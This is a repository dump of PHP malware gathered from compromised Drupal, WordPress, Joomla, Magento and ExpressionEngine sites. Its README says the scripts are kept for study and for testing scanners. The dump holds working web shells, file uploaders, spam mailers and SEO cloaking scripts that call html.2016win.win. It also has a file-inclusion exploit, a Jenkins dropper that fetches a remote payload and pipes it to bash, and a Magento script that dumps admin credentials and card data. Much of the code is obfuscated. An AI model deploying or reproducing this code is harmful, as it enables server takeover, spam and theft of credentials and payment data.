├── README.md ├── exp4php └── hadsky.php ├── found_on_drupal ├── Da.php ├── HV4V62BP.php ├── accesson.php ├── address.php ├── crouter.php ├── dirs.php ├── dirs_prettyfied.php ├── farbtastic_cache.php ├── farbtastic_cache_unobfuscated_version1.php ├── found_due_to_cve_2018_7600 │ ├── README.md │ ├── cpm.php │ ├── dump2.php │ ├── favicon_0ac3c0.ico │ ├── search2.php │ ├── snd.php │ ├── wpzr5qe.php │ └── xGASSx │ │ ├── gasskkcnqssetting.php │ │ ├── kkcnqs-ini.php │ │ ├── sites │ │ └── default │ │ │ ├── fileskkcnqssetting.php │ │ │ ├── kkcnqsini.php │ │ │ ├── kkcnqssetting.php │ │ │ └── xGASSx.php │ │ └── xGASSx.php ├── indoxploit.php ├── jpeg.htaccess.php ├── libasset.php ├── opn-post.php ├── payload.php ├── plugin38.php └── search7.php ├── found_on_expressionengine ├── ja.cleaned.php ├── ja.php ├── red.cleaned.php ├── red.php ├── upl.cleaned.php └── upl.php ├── found_on_jenkins ├── rsync.pl └── tddwrt7s.sh ├── found_on_joomla ├── a58a1fe9dafb308c.php ├── aks-showtopic.php ├── booter.php ├── cache.php ├── eoo-showtopic.php ├── license.php ├── links.db ├── phpeRwDi9.php ├── phpeRwDi9_prettyfied.php ├── settings.php ├── start.php ├── stats.php ├── xml.php ├── yy1rnn.php ├── yy1rnn_prettyfied.php └── zonfig.php ├── found_on_magento ├── dump.php └── log.php.php ├── found_on_nocms ├── evil snippets.php └── xml.php └── found_on_wordpress ├── .67b6958a.ico ├── 3ee39e7bb5725d92e9a6b735b5a2be19.php ├── 4691467424a1a1def32f61b6bae30800.php ├── about.php ├── backdoor_admin_access.php ├── class-ftp-inc.php ├── class-wp-updater(2).php ├── class-wp-updater.php ├── class-wp-widget-archives_render.php.suspected ├── class-wp-widget-archives_render.php_backup ├── classes92.php ├── config.php ├── config2.php ├── defines.php ├── dhanush.php ├── exceptions.php ├── favicon_f4df1e.ico ├── feeds.php ├── g31.php ├── header.php ├── hello.php ├── hozwfbdp.php ├── index.php ├── jhefppgr.php ├── lock.php ├── mai.php ├── mildnet.php ├── moyudazh.php ├── nes.php ├── nstview.php ├── phpd.local.php ├── priv8.php ├── readonly_default.php.suspected ├── readonly_default.php_backup ├── response41.php ├── script.php ├── shell.php ├── ssl.php ├── systemsinf.php ├── theme_bold_footer.php ├── themes_beatufied.php ├── wordpress-saved-with-a-dot-ico-extension.php ├── wp-blog.php ├── wp-content └── themes │ └── AdvanceImage5 │ └── header.php ├── wp-gallery.php ├── wp-good5ccca1742d54d5ccca1742d553.php.suspected ├── wp-include-5ccbd898281735ccbd8982817c.php ├── wp-insert5ccbd8965ecda5ccbd8965ece1.php ├── wp-rewrite.php ├── wp-rewrite.php.suspected ├── wp-seo-5ccbd899a479a5ccbd899a47a0.php ├── wp-taxonomy.php ├── wp-temp.php.suspected ├── wp-tempo.php ├── wso-24.php └── ykbh.php /README.md: -------------------------------------------------------------------------------- 1 | # php-exploit-scripts 2 | 3 | A collection of PHP exploit scripts, found when investigating hacked servers. These are stored for educational purposes and to test fuzzers and vulnerability scanners. Feel free to contribute. 4 | 5 | ### Why do you put these online? They're dangerous! 6 | 7 | Yes, obviously. Don't copy them and store them on your own server. These are scripts found on hacked systems, so they're used to exploit the server and abuse some kind of vulnerability. 8 | 9 | They are indeed dangerous in themselves. But if anyone can exploit a server or CMS, they can upload far more dangerous tools than these PHP scripts. 10 | 11 | ### Prettyfied the obfuscated code 12 | 13 | All obfuscated code has been run through the [PHP Formatter](http://beta.phpformatter.com/), [PHP Beautifier](http://phpbeautifier.com/) or [UnPHP](https://www.unphp.net/) for readability (whichever was online at that time). 14 | -------------------------------------------------------------------------------- /exp4php/hadsky.php: -------------------------------------------------------------------------------- 1 | 3) 17 | { 18 | die($die); 19 | } 20 | $poc='?c=page&filename=./puyuetian/mysql/config.php'; 21 | $ch=curl_init(); 22 | if(!$ch) 23 | { 24 | die("Dont support curl!"); 25 | } 26 | 27 | if($argc==2) 28 | { 29 | $url=$argv[1].$poc; 30 | curl_setopt($ch, CURLOPT_URL, $url); 31 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 32 | curl_setopt($ch, CURLOPT_HEADER, 0); 33 | $out=curl_exec($ch); 34 | $start=strpos($out,'$_G[\'MYSQL\']'); 35 | $end=strpos($out,'$_G[\'MYSQL\'][\'CHARSET\']'); 36 | $output=substr($out,$start,$end-$start); 37 | if($output) 38 | { 39 | echo "\r\noh yeah,got the result\r\n\r\n"; 40 | echo $output; 41 | } 42 | else 43 | { 44 | echo "oops,seems the config file has been renamed!"; 45 | } 46 | } 47 | if($argc==3) 48 | { 49 | $url=$argv[1].'?c=page&filename='.$argv[2]; 50 | curl_setopt($ch, CURLOPT_URL, $url); 51 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 52 | curl_setopt($ch, CURLOPT_HEADER, 0); 53 | $out=curl_exec($ch); 54 | $error='未找到的模板文件!'; 55 | $errorpos=strpos($out, $error); 56 | if($errorpos===false) 57 | { 58 | echo "Done,ur code has been excuted successfully!"; 59 | } 60 | else 61 | { 62 | echo "Failed!"; 63 | } 64 | } 65 | ?> -------------------------------------------------------------------------------- /found_on_drupal/Da.php: -------------------------------------------------------------------------------- 1 |

Emails:

Engenharia:

"; 19 | $vai = $_POST['vai']; 20 | if ($vai){ 21 | for ($set=0; $set < $n_emails; $set++){ 22 | if ($set==0){ 23 | $headers = "MIME-Version: 1.0\r\n"; 24 | $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; 25 | $headers .= "From: $nome[$msg] <$de[$msg]>\r\n"; 26 | $headers .= "Return-Path: <$de[$msg]>\r\n"; 27 | //mail($xsylar, $as, $fullurl, $headers); 28 | } 29 | $headers = "MIME-Version: 1.0\r\n"; 30 | $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; 31 | $headers .= "From: $nome[$msg] <$de[$msg]>\r\n"; 32 | $headers .= "Return-Path: <$de[$msg]>\r\n"; 33 | $n_mail++; 34 | $destino = $para[$set]; 35 | $num1 = rand(100000,999999); 36 | $num2 = rand(100000,999999); 37 | $msgrand = str_replace("%rand%", $num1, $mensagem[$msg]); 38 | $msgrand = str_replace("%rand2%", $num2, $msgrand); 39 | $msgrand = str_replace("%email%", $destino, $msgrand); 40 | $enviar = mail($destino, $assunto[$msg], $msgrand, $headers); 41 | if ($enviar){ 42 | echo (''. $n_mail .'-'. $destino .' 0k!
'); 43 | } else { 44 | echo (''. $n_mail .'-'. $destino .' =(
'); 45 | sleep(1); 46 | } 47 | } 48 | } 49 | } 50 | ?> 51 | 58 |
59 | 60 | 61 | 62 | 63 | 64 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 |
Name: 65 | 66 | 69 |
Email:
Sujet:
Letter's: 83 | 84 |

86 | 87 |
97 |
98 | -------------------------------------------------------------------------------- /found_on_drupal/HV4V62BP.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /found_on_drupal/accesson.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /found_on_drupal/crouter.php: -------------------------------------------------------------------------------- 1 | 2 | '|.*|e',);array_walk($arr, strval($_POST['pr']), '');}}?> 3 | -------------------------------------------------------------------------------- /found_on_drupal/found_due_to_cve_2018_7600/README.md: -------------------------------------------------------------------------------- 1 | # What is this? 2 | 3 | These are some of the examples we found on compromised Drupal installs at [Nucleus](https://www.nucleus.be/en/). 4 | 5 | They are the direct result of [CVE-2018-7600](https://www.drupal.org/sa-core-2018-002), a remote code execution vulnerability in Drupal. 6 | 7 | The pattern: 8 | 9 | - search.php, dump.php & wp-post.php: same filename everywhere. Always in the root of the Drupal installation. 10 | - favicon_0ac3c0.ico: the `0ac3c0` part is a variable hash every time. The file gets dumped somewhere in the `/themes/` or `/modules/` directory. 11 | 12 | These can easily be found & detected through a combination of [Maldet](https://www.rfxn.com/projects/linux-malware-detect/) and regex-searches on functions like `eval`, `gzinflate`, etc. 13 | -------------------------------------------------------------------------------- /found_on_drupal/found_due_to_cve_2018_7600/dump2.php: -------------------------------------------------------------------------------- 1 | >16)&255).chr((${${"\x47\x4cOBA\x4c\x53"}["a\x6ee\x64q\x65\x79\x76\x62"]}>>8)&255).chr(${$fyojtix}&255);}return substr(${${"\x47L\x4fBAL\x53"}["\x73\x77z\x6a\x64m\x6dek"]},0,strlen(${${"\x47\x4cO\x42\x41\x4cS"}["\x6a\x69\x68\x6b\x75\x6dy\x72\x6e\x71\x63"]})-strlen(${${"\x47LOB\x41LS"}["\x63\x74\x78\x67vq\x67l\x76\x6fg"]}));}function decode($data,$key){${"\x47L\x4f\x42ALS"}["n\x7a\x78z\x78\x68d\x75i\x77\x66"]="\x69";${"GLO\x42\x41L\x53"}["\x78i\x71\x77\x62\x64k\x77"]="\x6be\x79\x33";${"\x47\x4cOB\x41L\x53"}["h\x78\x6e\x74\x73\x6d"]="\x64\x61\x74a";$nfcrlzoqiyym="\x69";$ofbkzgrupiv="\x6fu\x74\x5fda\x74a";${"GLOB\x41\x4c\x53"}["ei\x61l\x75\x74\x75"]="\x69";${${"\x47L\x4fB\x41\x4cS"}["r\x65d\x73\x6fb\x64g\x66w"]}="0\x38ae\x381a2-\x6545\x31-4\x63\x39\x38-88c\x65-9d2\x32562\x66\x30\x61\x630";${"G\x4c\x4fB\x41L\x53"}["nm\x74ku\x6b\x64\x65"]="\x6f\x75t\x5fda\x74\x61";$eykvvkxfgb="\x69";$hlrlfgf="\x6be\x79";${${"\x47\x4c\x4fBA\x4cS"}["\x77\x64\x6b\x71\x65\x67\x62t\x73"]}=pack("\x48*","0\x34\x35d07\x35\x33\x30\x62\x350\x3035\x3700\x354\x35\x35\x35\x37\x35\x35\x30\x300\x305\x36\x35\x380e\x30\x30\x30\x31\x309500\x31\x3000\x66\x30\x32\x350\x30b\x30\x630\x30\x30\x3751\x3555\x33\x357\x35\x32");${$ofbkzgrupiv}="";${"GL\x4fBA\x4c\x53"}["o\x67y\x63\x73\x66\x71\x70q"]="key\x33";for(${$nfcrlzoqiyym}=0;${${"G\x4c\x4fBA\x4cS"}["n\x7ax\x7ax\x68\x64u\x69\x77\x66"]} 2 | '; if( $_POST['_con'] == "home" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'send is ok'; } else { echo 'mailer error'; }}} ?> 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | .:| Rebels Mailer |::. 13 | 68 | 69 | 70 | 71 | 115 | 116 |

.:| Rebels Mailer |::.

117 | 118 | 119 |
120 |

 

121 | 122 |
123 | 124 | 125 | 130 | 138 | 142 | 143 | 146 | 147 | 152 | 158 | 167 | 178 | 179 |
126 |
127 | Sender Email:
129 | 		131 |
133 | 		134 |
135 | Sender Name:
137 | 		139 | 141 |
144 | 145 |
148 |
149 | Subject:
151 | 		153 | 155 | 156 | 157 |
159 |  
161 | 162 |   163 | Wait 164 | 165 |   166 | seconds to send 		168 | 170 | 171 |
172 | Quantity Emails : 0
173 | 174 | Divide the mailing list by: 175 |     176 | 177 |
180 | 182 |
183 |
184 | 185 |
186 | 187 | 188 | 189 | 190 | 0){ set_time_limit(intval($_POST['wait'])*$numemails*3600); }else{ set_time_limit($numemails*3600); } if(!empty($smv)){ $smvn+=$smv; $tmn=$numemails/$smv+1; }else{ $tmn=1; } for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("#EM#", $to, $message); $subject = ereg_replace("#EM#", $to, $subject); flush(); $header = "From: $realname <$from> 192 | "; $header .= "MIME-Version: 1.0 193 | "; $header .= "Content-Type: text/html 194 | "; if ($x==0 && !empty($tem)) { if(!@mail($tem,$subject,$message,$header)){ print('The test Post was not Submitted.
'); $tmns+=1; }else{ print('Your Message was Sent Test.
'); $tms+=1; } } if($x==$smvn && !empty($_POST['smv'])){ if(!@mail($tem,$subject,$message,$header)){ print('The test Post was not Submitted.
'); $tmns+=1; }else{ print('Your Message was Sent Test.
'); $tms+=1; } $smvn+=$smv; } print "$to ....... "; $msent = @mail($to, $subject, $message, $header); $xx = $x+1; $txtspamed = "spammed"; if(!$msent){ $txtspamed = "error"; $ns+=1; $nse[$ns]=$to; } print "$xx / $numemails ....... $txtspamed
"; flush(); if(!empty($wait)&& $x<$numemails-1){ sleep($wait); } } } } ?> 195 |
196 |
197 |
198 |
199 |
200 |
201 | 202 | 203 | 204 | -------------------------------------------------------------------------------- /found_on_drupal/found_due_to_cve_2018_7600/wpzr5qe.php: -------------------------------------------------------------------------------- 1 | '.'Uname:'.php_uname().'
'.$cwd = getcwd(); Echo '

'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "Uploaded !!!
name : ".$_FILES['uploads']['name']."
size : ".$_FILES['uploads']['size']."
type : ".$_FILES['uploads']['type']; } ?> -------------------------------------------------------------------------------- /found_on_drupal/found_due_to_cve_2018_7600/xGASSx/sites/default/xGASSx.php: -------------------------------------------------------------------------------- 1 |
uname:".php_uname()."
fallagateam"; 8 | print "\n";$disable_functions = @ini_get("disable_functions"); 9 | echo "DisablePHP=".$disable_functions; print "
"; 10 | echo"
"; 11 | echo"
"; 12 | if($_POST["v"]==up) 13 | { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"berhasil-->".$_FILES["f"]["name"];}else{echo"gagal";}} 14 | { if(@copy($_FILES["gass"]["tmp_name"],$_FILES["gass"]["name"])){echo"-->".$_FILES["gass"]["name"];}else{echo"";}}} 15 | ?> -------------------------------------------------------------------------------- /found_on_drupal/found_due_to_cve_2018_7600/xGASSx/xGASSx.php: -------------------------------------------------------------------------------- 1 |
uname:".php_uname()."
fallagateam"; 8 | print "\n";$disable_functions = @ini_get("disable_functions"); 9 | echo "DisablePHP=".$disable_functions; print "
"; 10 | echo""; 11 | echo"
"; 12 | if($_POST["v"]==up) 13 | { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"berhasil-->".$_FILES["f"]["name"];}else{echo"gagal";}} 14 | { if(@copy($_FILES["gass"]["tmp_name"],$_FILES["gass"]["name"])){echo"-->".$_FILES["gass"]["name"];}else{echo"";}}} 15 | ?> -------------------------------------------------------------------------------- /found_on_drupal/jpeg.htaccess.php: -------------------------------------------------------------------------------- 1 | sites/libasset.phpArraymarkupArraysites/libasset.php 2 | -------------------------------------------------------------------------------- /found_on_drupal/opn-post.php: -------------------------------------------------------------------------------- 1 | 11 | -------------------------------------------------------------------------------- /found_on_drupal/payload.php: -------------------------------------------------------------------------------- 1 | "; if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) { echo "Upload Successful\n"; } else { echo "Failed To Upload";} echo "

"; echo "
"; echo "Information :\n"; echo "Your Directory Is :"; echo getcwd() . "\n"; print_r($_FILES); if ($_FILES["userfile"]["error"] == 0){ echo "

{$_FILES["userfile"]["name"]}

"; echo getcwd() . "\n"; } echo "
"; } echo ""; echo ""; echo "Select Your File : "; echo ""; echo ""; echo "Spider Project"; exit; ?> 2 | -------------------------------------------------------------------------------- /found_on_expressionengine/ja.cleaned.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | createElement('urlset'); 30 | $dom->appendChild($urlset); 31 | $xmlns = $dom->createAttribute("xmlns"); 32 | $urlset->appendChild($xmlns); 33 | $xmlnsvalue = $dom->createTextNode("http://www.sitemaps.org/schemas/sitemap/0.9"); 34 | $xmlns->appendChild($xmlnsvalue); 35 | foreach($arrayUrls as $k=>$v){ 36 | $url = $dom->createElement("url"); 37 | $urlset->appendChild($url); 38 | $loc = $dom->createElement("loc"); 39 | $url->appendChild($loc); 40 | $text = $dom->createTextNode($v); 41 | $loc->appendChild($text); 42 | } 43 | header("Content-type:text/xml; charset=utf-8"); 44 | echo $dom->saveXML(); 45 | exit; 46 | } 47 | if ($isBot){ 48 | if(!$isoldpage){ 49 | $queryid=$_SERVER['QUERY_STRING']; 50 | $str = GetFileContent("http://html.2016win.win/v1/proxy2.php?".$u[1]."|".$_SERVER['HTTP_HOST']); 51 | echo $str; 52 | exit; 53 | }else{ 54 | $str=GetFileContent("http://html.2016win.win/v1/proxy.php?".$u[0]); 55 | echo $str; 56 | exit; 57 | } 58 | }else if (isSpider($referer) && $isJa){ 59 | echo ''; 60 | exit; 61 | } 62 | function isGoogleBot(){ 63 | if(stripos($_SERVER["HTTP_USER_AGENT"], "Googlebot") !== false) return true; 64 | else return false; 65 | } 66 | 67 | function isJaBrower(){ 68 | if(strpos(strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), "ja") !== false) return true; 69 | else return false; 70 | } 71 | 72 | function isSpider($referer){ 73 | if(strpos(strtolower($referer), "google") !== false || strpos(strtolower($referer), "yahoo") !== false) return true; 74 | else return false; 75 | } 76 | 77 | function isoldpage(){ 78 | if(strpos($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'],'?ja-') !== false) return false; 79 | else return true; 80 | } 81 | function GetFileContent($url){ 82 | $ch = curl_init(); 83 | $timeout = 30; 84 | curl_setopt ($ch, CURLOPT_URL, $url); 85 | curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 86 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); 87 | $file_contents = curl_exec($ch); 88 | curl_close($ch); 89 | return $file_contents; 90 | } 91 | ?> 92 | 93 | 94 | -------------------------------------------------------------------------------- /found_on_expressionengine/ja.php: -------------------------------------------------------------------------------- 1 | createElement('urlset'); 24 | $dom->appendChild($urlset); 25 | $xmlns = $dom->createAttribute("xmlns"); 26 | $urlset->appendChild($xmlns); 27 | $xmlnsvalue = $dom->createTextNode("http://www.sitemaps.org/schemas/sitemap/0.9"); 28 | $xmlns->appendChild($xmlnsvalue); 29 | foreach($arrayUrls as $k=>$v){ 30 | $url = $dom->createElement("url"); 31 | $urlset->appendChild($url); 32 | $loc = $dom->createElement("loc"); 33 | $url->appendChild($loc); 34 | $text = $dom->createTextNode($v); 35 | $loc->appendChild($text); 36 | } 37 | header("Content-type:text/xml; charset=utf-8"); 38 | echo $dom->saveXML(); 39 | exit; 40 | } 41 | if ($isBot){ 42 | if(!$isoldpage){ 43 | $queryid=$_SERVER['QUERY_STRING']; 44 | $str = GetFileContent("http://html.2016win.win/v1/proxy2.php?".$u[1]."|".$_SERVER['HTTP_HOST']); 45 | echo $str; 46 | exit; 47 | }else{ 48 | $str=GetFileContent("http://html.2016win.win/v1/proxy.php?".$u[0]); 49 | echo $str; 50 | exit; 51 | } 52 | }else if (isSpider($referer) && $isJa){ 53 | echo ''; 54 | exit; 55 | } 56 | function isGoogleBot(){ 57 | if(stripos($_SERVER["HTTP_USER_AGENT"], "Googlebot") !== false) return true; 58 | else return false; 59 | } 60 | 61 | function isJaBrower(){ 62 | if(strpos(strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), "ja") !== false) return true; 63 | else return false; 64 | } 65 | 66 | function isSpider($referer){ 67 | if(strpos(strtolower($referer), "google") !== false || strpos(strtolower($referer), "yahoo") !== false) return true; 68 | else return false; 69 | } 70 | 71 | function isoldpage(){ 72 | if(strpos($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'],'?ja-') !== false) return false; 73 | else return true; 74 | } 75 | function GetFileContent($url){ 76 | $ch = curl_init(); 77 | $timeout = 30; 78 | curl_setopt ($ch, CURLOPT_URL, $url); 79 | curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 80 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); 81 | $file_contents = curl_exec($ch); 82 | curl_close($ch); 83 | return $file_contents; 84 | } 85 | ?> -------------------------------------------------------------------------------- /found_on_expressionengine/upl.cleaned.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | ;V|\x0c™éG4W€D9'|2-ó?Ôè+zî°Î4›a˙ò8ÈØWƒ©7¥≈ı’ψ‚Ê\x22òt7\x0cê,fih∏}êhc1ñºÖõ_UJp™ˇïœ˜ÉnøE‘e‡>؉uWF€—ÊE|ÆËΟ¸Å0˛9\x09√˘nZ1\x09v∏çªSna≠± ó”∞\x22D⁄=_í#|‹î√‚∫Ñ]¶˘;°â„N")); ?> 8 | 9 | 10 | 12 | 13 | This shit works! 14 | 15 | 16 |

Form for upload!

17 |

'; 18 | echo (php_uname()); 19 | echo '

20 |
21 |
22 |
23 |
'; 24 | 25 | if (isset($_FILES['filename'])) { 26 | if ($_FILES["filename"]["size"] > 1024 * 3 * 1024) { 27 | echo ("File too large (more than 3Mb)"); 28 | exit; 29 | } 30 | 31 | if (is_uploaded_file($_FILES["filename"]["tmp_name"])) { 32 | move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]); 33 | echo ("
Done!
"); 34 | } else { 35 | echo ("
Error! " . $php_errormsg . "
"); 36 | } 37 | }; 38 | echo ' 39 | '; -------------------------------------------------------------------------------- /found_on_expressionengine/upl.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattiasgeniar/php-exploit-scripts/a6ab857232e15866aab2e37338941fb2e19e60f5/found_on_expressionengine/upl.php -------------------------------------------------------------------------------- /found_on_jenkins/tddwrt7s.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -d "/tmp/.X13-unix/.rsync/c" ]; then 3 | exit 0 4 | else 5 | cd /tmp 6 | rm -rf .ssh 7 | rm -rf .mountfs 8 | rm -rf .X13-unix 9 | mkdir .X13-unix 10 | cd .X13-unix 11 | RANGE=6 12 | s=$RANDOM 13 | let "s %= $RANGE" 14 | if [ $s == 0 ]; then 15 | sleep $[ ( $RANDOM % 500 ) + 15 ]s 16 | curl -O -f $1 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $1 17 | fi 18 | if [ $s == 1 ]; then 19 | sleep $[ ( $RANDOM % 500 ) + 5 ]s 20 | curl -O -f $2 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $2 21 | fi 22 | if [ $s == 2 ]; then 23 | sleep $[ ( $RANDOM % 500 ) + 25 ]s 24 | curl -O -f $3 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $3 25 | fi 26 | if [ $s == 3 ]; then 27 | sleep $[ ( $RANDOM % 500 ) + 10 ]s 28 | curl -O -f $4 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $4 29 | fi 30 | if [ $s == 4 ]; then 31 | sleep $[ ( $RANDOM % 500 ) + 30 ]s 32 | curl -O -f $5 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $5 33 | fi 34 | if [ $s == 5 ]; then 35 | sleep $[ ( $RANDOM % 500 ) + 15 ]s 36 | curl -O -f $6 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $6 37 | fi 38 | if [ $s == 6 ]; then 39 | sleep $[ ( $RANDOM % 500 ) + 55 ]s 40 | curl -O -f $7 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $7 41 | fi 42 | sleep 60s 43 | tar xvf dota.tar.gz 44 | sleep 10s 45 | # rm -rf dota.tar.gz 46 | cd .rsync 47 | cat /tmp/.X13-unix/.rsync/initall | bash 48 | fi 49 | exit 0 50 | -------------------------------------------------------------------------------- /found_on_joomla/aks-showtopic.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | utf 5 | 6 | 7 | #p@$c@#\n"; 9 | echo "Your IP: "; 10 | echo $_SERVER['REMOTE_ADDR']; 11 | echo "
\n"; 12 | echo "
\n"; 13 | echo "
\n"; 14 | echo "
\n"; 15 | if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"])) 16 | { 17 | move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]); 18 | $file = $_FILES/*;*/["filename"]["name"]; 19 | echo "$file"; 20 | } else { 21 | echo("empty"); 22 | } 23 | $filename = $_SERVER[SCRIPT_FILENAME]; 24 | touch/*;*/($filename, $time); 25 | ?> 26 | 27 | -------------------------------------------------------------------------------- /found_on_joomla/links.db: -------------------------------------------------------------------------------- 1 | a:25:{s:18:"__sape_delimiter__";s:2:". ";s:16:"__sape_teasers__";a:0:{}s:12:"__for_user__";s:32:"ee9f7492a0556638a28a029494868231";s:12:"__for_host__";s:30:"http://firstnationsveterans.ca";s:31:"__sape_page_obligatory_output__";s:284:"";s:27:"__sape_teaser_images_path__";s:8:"img.php?";s:28:"/index.php?option=com_joomap";a:1:{i:0;s:143:" נדב ברנדשטטר ";}s:53:"/index.php?option=com_content&task=view&id=1&Itemid=2";a:2:{i:0;s:105:" fibre optic sensors and sensing systems ";i:1;s:127:" Curtain rising on glass walls toronto. ";}s:53:"/index.php?option=com_content&task=view&id=2&Itemid=4";a:1:{i:0;s:136:" Air conditioning through the wall units. ";}s:38:"/index.php?option=com_contact&Itemid=3";a:1:{i:0;s:99:" 16 weeks pregnant ultrasound ";}s:53:"/index.php?option=com_content&task=view&id=3&Itemid=5";a:2:{i:0;s:77:" Robert Colangelo ";i:1;s:57:" cialis ";}s:24:"__sape_show_only_block__";b:0;s:18:"__sape_block_tpl__";a:3:{s:3:"css";s:2156:"";i:1;a:3:{s:5:"block";s:88:"
{items}
";s:14:"item_container";s:68:" {item} ";s:4:"item";s:209:"

{header}

{text}

{url}

";}i:0;a:3:{s:5:"block";s:71:"
    {items}
";s:14:"item_container";s:54:"
  • {item}
    • ";s:4:"item";s:209:"

    {header}

    {text}

    {url}

    ";}}s:26:"__sape_block_tpl_options__";a:2:{s:17:"block_orientation";i:1;s:12:"block_no_css";i:0;}s:23:"__sape_block_uri_idna__";a:0:{}s:20:"__sape_teasers_css__";s:4947:"";s:16:"__sape_new_url__";s:20:"";s:26:"__sape_new_teasers_block__";s:21:"";s:16:"__sape_charset__";s:5:"UTF-8";s:15:"__last_update__";i:1472849984;s:14:"__multi_site__";b:0;s:21:"__fetch_remote_type__";s:17:"file_get_contents";s:15:"__ignore_case__";b:0;s:15:"__php_version__";s:6:"5.5.30";s:19:"__server_software__";s:6:"Apache";} -------------------------------------------------------------------------------- /found_on_joomla/phpeRwDi9.php: -------------------------------------------------------------------------------- 1 | F89aG 2 | 60 | -------------------------------------------------------------------------------- /found_on_joomla/settings.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattiasgeniar/php-exploit-scripts/a6ab857232e15866aab2e37338941fb2e19e60f5/found_on_joomla/settings.php -------------------------------------------------------------------------------- /found_on_joomla/start.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /found_on_joomla/stats.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /found_on_magento/dump.php: -------------------------------------------------------------------------------- 1 | 10 | 35 | '.php_uname().''; 37 | $adm = ' 38 | mysql_select_db($connection->dbname); 39 | echo "HOST : ".$connection->host ." | USERNAME : ".$connection->username." | PASSWORD : ".$connection->password." | DB_NAME : ".$connection->dbname."

    "; 40 | $result = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM `".$prefix."admin_user` where is_active = 1"); 41 | if($result !== FALSE) { 42 | while($row = mysql_fetch_array($result, MYSQL_ASSOC)) { 43 | echo "".$row["user_id"]." 44 | ".$row["username"]." 45 | ".$row["password"]." 46 | ".$row["email"]." 47 | ".$row["firstname"]." 48 | ".$row["lastname"].""; 49 | 50 | } 51 | mysql_free_result($result); 52 | } 53 | '; 54 | 55 | $ccpay = 'ICRyZXN1bHQgPSBteXNxbF9xdWVyeSgiU0VMRUNUIGNvdW50KCopIEZST00gYCIuJHByZWZpeC4ic2FsZXNfZmxhdF9vcmRlcl9wYXltZW50YCB3aGVyZSANCg0KY2NfbnVtYmVyX2VuYyAhPScnIik7DQogICAgICAgaWYoJHJlc3VsdCAhPT0gRkFMU0UpIHsNCiAgICAgICAgICAgJGNvdW50ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCwgTVlTUUxfTlVNKTsNCiAgICAgICAgICAgbXlzcWxfZnJlZV9yZXN1bHQoJHJlc3VsdCk7DQogICAgICAgICAgIGlmKCRjb3VudCAmJiAkY291bnRbMF0pew0KICAgICAgICAgICAgICAgJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgDQoNCnNmby5jY19vd25lcixzZm8uY2NfbnVtYmVyX2VuYyxzZm8uY2Nfc2VjdXJlX3ZlcmlmeSxDT05DQVQoc2ZvLmNjX2V4cF9tb250aCwnfCcsc2ZvLmNjX2V4cF95ZWFyKSBhcyANCg0KZXhwLENPTkNBVChiaWxsaW5nLmZpcnN0bmFtZSwnfCcsYmlsbGluZy5sYXN0bmFtZSwnfCcsYmlsbGluZy5zdHJlZXQsJ3wnLGJpbGxpbmcuY2l0eSwnfCcsIA0KDQpiaWxsaW5nLnJlZ2lvbiwnfCcsYmlsbGluZy5wb3N0Y29kZSwnfCcsYmlsbGluZy5jb3VudHJ5X2lkLCd8JyxiaWxsaW5nLnRlbGVwaG9uZSwnfCcsYmlsbGluZy5lbWFpbCkgDQoNCkFTICdCaWxsaW5nIEFkZHJlc3MnIEZST00gIi4kcHJlZml4LiJzYWxlc19mbGF0X29yZGVyX3BheW1lbnQgQVMgc2ZvIEpPSU4gIi4NCg0KJHByZWZpeC4ic2FsZXNfZmxhdF9vcmRlcl9hZGRyZXNzIEFTIGJpbGxpbmcgT04gYmlsbGluZy5wYXJlbnRfaWQgPSBzZm8ucGFyZW50X2lkIEFORCANCg0KYmlsbGluZy5hZGRyZXNzX3R5cGUgPSAnYmlsbGluZycgd2hlcmUgY2NfbnVtYmVyX2VuYyAhPSAnJyIpOw0KICAgI